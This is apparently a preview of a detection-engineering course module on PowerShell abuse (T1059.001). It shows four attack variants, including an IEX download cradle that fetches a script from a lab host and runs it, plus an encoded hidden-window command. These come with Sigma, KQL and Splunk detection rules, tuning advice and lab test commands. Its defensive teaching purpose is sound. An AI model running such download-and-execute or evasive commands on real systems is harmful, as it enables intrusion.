Sample Technique Sub — T1059.001 PowerShell (Preview from Module 3)

1. Scene

You're reviewing the morning's Sentinel alerts. Three PowerShell alerts fired overnight — all from the same endpoint, all within twelve minutes. The first used -EncodedCommand, the second used Invoke-Expression with a download cradle, the third used -WindowStyle Hidden with a Base64-encoded payload. Your current rule caught the first two. It missed the third. You don't know why until you look at the rule — it matches on -enc and IEX but not on -WindowStyle Hidden. The attacker tried three variants. Your rule caught two-thirds of them. That's the gap this sub closes.

2. Learning Objectives

By the end of this sub you will be able to:

• Execute T1059.001 in four variants and observe the telemetry each produces
• Identify the Sysmon Event 1 fields that distinguish malicious PowerShell from legitimate usage
• Write and tune a Sigma rule that catches all four variants without producing excessive false positives

3. The Technique

T1059.001 — Command and Scripting Interpreter: PowerShell

Adversaries use PowerShell to execute commands, download payloads, and run scripts in memory. PowerShell is the most commonly abused execution technique on Windows because it's signed by Microsoft, present on every Windows system, and capable of downloading and running code entirely in memory — no file touches disk, no traditional AV signature fires.

T1059.001 is a sub-technique of T1059 (Command and Scripting Interpreter). The parent technique covers all scripting interpreters — PowerShell (001), AppleScript (002), Windows Command Shell (003), Unix Shell (004), Visual Basic (005), Python (006), JavaScript (007). This sub covers the PowerShell variant only.

4. Safety and Legal

5. The Attack

Variant 1 — Encoded command (the baseline most rules catch)

# What the attacker runs
powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgB3AGgAbwBhAG0AaQAiAA==

# Decoded, this is: Invoke-Expression "whoami"

Variant 2 — Download cradle (downloads and executes in memory)

powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.20/test.ps1')"

Variant 3 — Base64 with hidden window (evades rules that match on -enc but not -WindowStyle)

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p')) | IEX"

Variant 4 — Living-off-the-land via PowerShell remoting (no powershell.exe in the command line)

# Attacker uses Invoke-Command from a compromised host
Invoke-Command -ComputerName PT-WIN-ENDPOINT -ScriptBlock { whoami }
# This spawns wsmprovhost.exe on the target — not powershell.exe

Each variant produces different Sysmon Event 1 fields. A rule that matches on powershell.exe -enc catches Variant 1 but misses Variants 3 and 4 entirely.

6. What Just Fired

Variant 1 — Sysmon Event 1:

{
  "EventID": 1,
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQ...",
  "ParentImage": "C:\\Windows\\System32\\cmd.exe",
  "User": "YOURLAB\\t.ashworth"
}

Variant 3 — Sysmon Event 1 (the one most rules miss):

{
  "EventID": 1,
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"[System.Text.Encoding]::UTF8.GetString(...)\"",
  "ParentImage": "C:\\Windows\\System32\\cmd.exe",
  "User": "YOURLAB\\t.ashworth"
}

No -enc flag. No IEX. No DownloadString. The command decodes Base64 via .NET and pipes to IEX inside the -Command argument. A rule matching on -enc or IEX as separate tokens misses this because IEX is inside a quoted string after a pipe.

Variant 4 — Sysmon Event 1 (on the target):

{
  "EventID": 1,
  "Image": "C:\\Windows\\System32\\wsmprovhost.exe",
  "CommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding",
  "ParentImage": "C:\\Windows\\System32\\svchost.exe",
  "User": "YOURLAB\\t.ashworth"
}

No powershell.exe at all. The process is wsmprovhost.exe — the WinRM host process. Any rule matching on Image containing powershell.exe misses this entirely.

7. The Detection

title: Suspicious PowerShell Execution - Multi-Variant
id: 7c3e9f01-2a4b-5c6d-8e9f-0a1b2c3d4e5f
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection_encoded:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-enc'
            - '-EncodedCommand'
            - 'FromBase64String'
    selection_cradle:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Net.WebClient'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'IWR '
    selection_hidden:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-WindowStyle Hidden'
            - '-w hidden'
            - '-win hid'
    selection_remoting:
        Image|endswith: '\wsmprovhost.exe'
        ParentImage|endswith: '\svchost.exe'
    filter_system:
        User|startswith: 'NT AUTHORITY'
    condition: (selection_encoded or selection_cradle or selection_hidden or selection_remoting) and not filter_system
level: high
tags:
    - attack.execution
    - attack.t1059.001

// Sentinel KQL — T1059.001 Multi-Variant PowerShell Detection
DeviceProcessEvents
| where TimeGenerated > ago(1h)
| where (
    // Variants 1-3: powershell.exe with suspicious arguments
    (InitiatingProcessFileName =~ "powershell.exe" and
     ProcessCommandLine has_any (
       "-enc", "-EncodedCommand", "FromBase64String",
       "Net.WebClient", "DownloadString", "IEX",
       "Invoke-Expression", "-WindowStyle Hidden",
       "-w hidden", "bypass"
     ))
    or
    // Variant 4: WinRM remoting (wsmprovhost.exe)
    (FileName =~ "wsmprovhost.exe" and
     InitiatingProcessFileName =~ "svchost.exe")
  )
| where AccountName !startswith "SYSTEM"
| project TimeGenerated, DeviceName, FileName,
          ProcessCommandLine, AccountName,
          InitiatingProcessFileName

// Defender XDR Advanced Hunting — T1059.001
DeviceProcessEvents
| where Timestamp > ago(1h)
| where (
    (InitiatingProcessFileName == "powershell.exe" and
     ProcessCommandLine has_any (
       "-enc", "-EncodedCommand", "FromBase64String",
       "Net.WebClient", "DownloadString", "IEX",
       "Invoke-Expression", "-WindowStyle Hidden",
       "-w hidden", "bypass"
     ))
    or
    (FileName == "wsmprovhost.exe" and
     InitiatingProcessFileName == "svchost.exe")
  )
| where AccountName != "SYSTEM"
| project Timestamp, DeviceName, FileName,
          ProcessCommandLine, AccountName

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
    EventCode=1
    ((Image="*\\powershell.exe"
      (CommandLine="*-enc*" OR CommandLine="*EncodedCommand*"
       OR CommandLine="*FromBase64String*" OR CommandLine="*Net.WebClient*"
       OR CommandLine="*DownloadString*" OR CommandLine="*IEX*"
       OR CommandLine="*WindowStyle Hidden*" OR CommandLine="*-w hidden*"))
     OR
     (Image="*\\wsmprovhost.exe" ParentImage="*\\svchost.exe"))
| where User!="NT AUTHORITY\\SYSTEM"
| table _time Computer Image CommandLine User
| sort - _time

The rule has four selection blocks — one per variant. The or condition means any single variant triggers the alert. The system account filter prevents the rule from firing on Windows' own PowerShell activity.

8. The Tuning Loop

False-positive sources for this rule:

Environmental FPs: IT automation scripts running as domain users with -EncodedCommand (SCCM, Intune, monitoring tools). Fix: exclude by parent process (CcmExec.exe, IntuneManagementExtension.exe) rather than by command content.

Rule-logic FPs: bypass in the command line matches legitimate Set-ExecutionPolicy Bypass during software installation. Fix: require bypass AND at least one other suspicious indicator (download cradle, hidden window, encoding).

Baseline FP rate: 3–8 per day in a typical 800-endpoint environment after tuning. Driven primarily by IT automation. Most are resolved by parent-process exclusions within the first week.

Continuous rhythm: retest monthly. New automation tools get deployed. Each one may produce command lines that match the rule. The monthly retest catches new FPs before they become alert fatigue.

9. Decision Exercise

Your rule fires on this command line:

powershell.exe -ExecutionPolicy Bypass -File "C:\ProgramData\Microsoft\Updates\update.ps1"

The process ran as YOURLAB\t.ashworth at 02:14 AM. The parent process is svchost.exe. The file update.ps1 does not exist on disk when you check.

Which of these is the correct assessment?

A. Environmental FP — a scheduled update script that has since been cleaned up.

B. Suspicious — the file ran at 2 AM, the parent is svchost (unusual for a user-context script), and the file is gone. Investigate as potential malicious execution.

C. Rule-logic FP — -ExecutionPolicy Bypass is too broad a match and should be removed from the rule.

D. Benign TP — a legitimate script that happened to use bypass.

10. Try-it

Fire all four variants on PT-WIN-ENDPOINT (logged in as YOURLAB\t.ashworth):

# Variant 1 — Encoded command
Invoke-AtomicTest T1059.001 -TestNumbers 4

# Variant 2 — Download cradle (uses a safe local test)
Invoke-AtomicTest T1059.001 -TestNumbers 1

# Variant 3 — Hidden window (manual)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "whoami | Out-File C:\Temp\test-v3.txt"

# Variant 4 — Remoting (requires WinRM enabled)
Invoke-Command -ComputerName localhost -ScriptBlock { whoami }

Check each SIEM. For each variant, run the detection query from the tabs above. Record which variants fired in each SIEM and the MTTD.

Expected result: Variants 1–3 should fire in all three SIEMs. Variant 4 fires only if your rule includes the wsmprovhost.exe selection block. If Variant 4 doesn't fire, add the selection block and retest.

Cleanup:

Invoke-AtomicTest T1059.001 -TestNumbers 4 -Cleanup
Invoke-AtomicTest T1059.001 -TestNumbers 1 -Cleanup
Remove-Item C:\Temp\test-v3.txt -ErrorAction SilentlyContinue

11. Reference Card